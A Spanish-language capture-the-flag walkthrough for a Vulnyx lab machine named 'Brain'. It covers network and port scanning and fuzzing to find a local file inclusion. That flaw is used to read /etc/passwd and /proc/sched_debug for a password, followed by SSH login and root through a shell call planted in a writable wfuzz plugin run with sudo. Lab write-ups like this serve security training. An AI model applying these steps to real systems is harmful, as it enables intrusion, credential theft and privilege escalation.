Máquina: Brain
SO: Linux
Dificultad: Easy
Link OVA: Vulnyx


serve

1. Verificamos dispositivos en la red.

sudo arp-scan -I enp2s0 --localnet

host

2. Escaneamos puertos del host víctima.

sudo nmap -p- -sS -T5 -sCV --open --min-rate=5000 -n -Pn 192.168.1.7 -oN report_scan

host

3. Visitamos el servicio Apache por el puerto 80.

http://192.168.1.7/

host

4. Hacemos fuzzing de directorios y archivos.

gobuster dir -u http://192.168.1.7/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt

host

  • Si visitamos index.php vemos lo mismo:

host

5. Hacemos fuzzing de parámetros en busca de un LFI..

wfuzz -c -t 50 --hl=7 --hc=404 -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt 'http://192.168.1.7/index.php?FUZZ=/etc/passwd'

host

6. Ingresamos la ruta completa con el parámetro hallado.

http://192.168.1.7/index.php?include=/etc/passwd

host

tenemos inclusion de archivos locales (LFI)

  • Si presionamos ctrl + u podemos visualizar mejor, y encontramos el usuario ben:

host

7. incluimos el la ruta sched_debug, donde podemos ver la contraseña de ben.

view-source:http://192.168.1.7/index.php?include=/proc/sched_debug

host

- Si un servidor web tiene una vulnerabilidad LFI y permite acceder a esta ruta, un atacante podría obtener información confidencial, como contraseñas almacenadas en memoria.

8. Accedemos por ssh al host como el usuario ben.

ssh ben@192.168.1.7

host

9. Listamos permisos sudo, podemos ejecutar el binario wfuzz como root.

sudo -l

host

- buscando en la web gtfobins no encontramos referencia alguna.

10. Buscamos archivos con permisos de escritura relacionados al binario wfuzz.

find / -type f -writable 2> /dev/null | grep wfuzz

11. Agregamos estas 2 lineas para obtener una bash.

nano /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py

import os

os.system("/bin/bash")

12. Ejecutamos el binario como root, ya somos superusuario.

sudo /usr/bin/wfuzz -c -z range 1-2

13. Finalizamos leendo la flag de root.

cd

ls

cat root.txt


Finalizado.